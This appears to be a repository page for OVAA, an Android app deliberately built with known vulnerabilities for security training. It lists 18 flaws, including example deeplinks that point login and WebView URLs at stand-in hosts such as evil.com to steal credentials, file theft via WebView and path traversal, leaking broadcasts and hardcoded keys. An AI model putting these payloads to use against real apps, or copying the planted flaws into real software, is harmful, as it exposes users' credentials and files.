Need help with ovaa?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

oversecured
139 Stars 20 Forks BSD 2-Clause "Simplified" License 4 Commits 0 Opened issues

Description

Oversecured Vulnerable Android App

Services available

!
?

Need anything else?

Contributors list

No Data

Description

OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.

List of vulnerabilities

This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.

  1. Installation of an arbitrary
    login_url
    via deeplink
    oversecured://ovaa/login?url=http://evil.com/
    . Leads to the user's user name and password being leaked when they log in.
  2. Obtaining access to arbitrary content providers (not exported, but with the attribute
    android:grantUriPermissions="true"
    ) via deeplink
    oversecured://ovaa/grant_uri_permissions
    . The attacker's app needs to process
    oversecured.ovaa.action.GRANT_PERMISSIONS
    and pass intent to
    setResult(code, intent)
    with flags such as
    Intent.FLAG_GRANT_READ_URI_PERMISSION
    and the URI of the content provider.
  3. Vulnerable host validation when processing deeplink
    oversecured://ovaa/webview?url=...
    .
  4. Opening arbitrary URLs via deeplink
    oversecured://ovaa/webview?url=http://evilexample.com
    . An attacker can use the vulnerable WebView setting
    WebSettings.setAllowFileAccessFromFileURLs(true)
    in the
    WebViewActivity.java
    file to steal arbitrary files by sending them XHR requests and obtaining their content.
  5. Access to arbitrary activities and acquiring access to arbitrary content providers in
    LoginActivity
    by supplying an arbitrary Intent object to
    redirect_intent
    .
  6. Theft of arbitrary files in
    MainActivity
    by intercepting an activity launch from
    Intent.ACTION_PICK
    and passing the URI to any file as data.
  7. Insecure broadcast to
    MainActivity
    containing credentials. The attacker can register a broadcast receiver with action
    oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA
    and obtain the user's data.
  8. Insecure activity launch in
    MainActivity
    with action
    oversecured.ovaa.action.WEBVIEW
    , containing the user's encrypted data in the query parameter
    token
    .
  9. Deletion of arbitrary files via the insecure
    DeleteFilesSerializable
    deserialization object.
  10. Memory corruption via the
    MemoryCorruptionParcelable
    object.
  11. Memory corruption via the
    MemoryCorruptionSerializable
    object.
  12. Obtaining read/write access to arbitrary files in
    TheftOverwriteProvider
    via path-traversal in the value
    uri.getLastPathSegment()
    .
  13. Obtaining access to app logs via
    InsecureLoggerService
    . Leak of credentials in
    LoginActivity
    Log.d("ovaa", "Processing " + loginData)
    .
  14. Use of the hardcoded AES key in
    WeakCrypto
    .
  15. Arbitrary Code Execution in
    OversecuredApplication
    by launching code from third-party apps with no security checks.
  16. Use of very wide file sharing declaration for
    oversecured.ovaa.fileprovider
    content provider in
    root
    entry.
  17. Hardcoded credentials to a dev environment endpoint in
    strings.xml
    in
    test_url
    entry.
  18. Arbitrary code execution via a DEX library located in a world-readable/writable directory.

Licensed under the Simplified BSD License

Copyright (c) 2020, Oversecured Inc

https://oversecured.com/

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.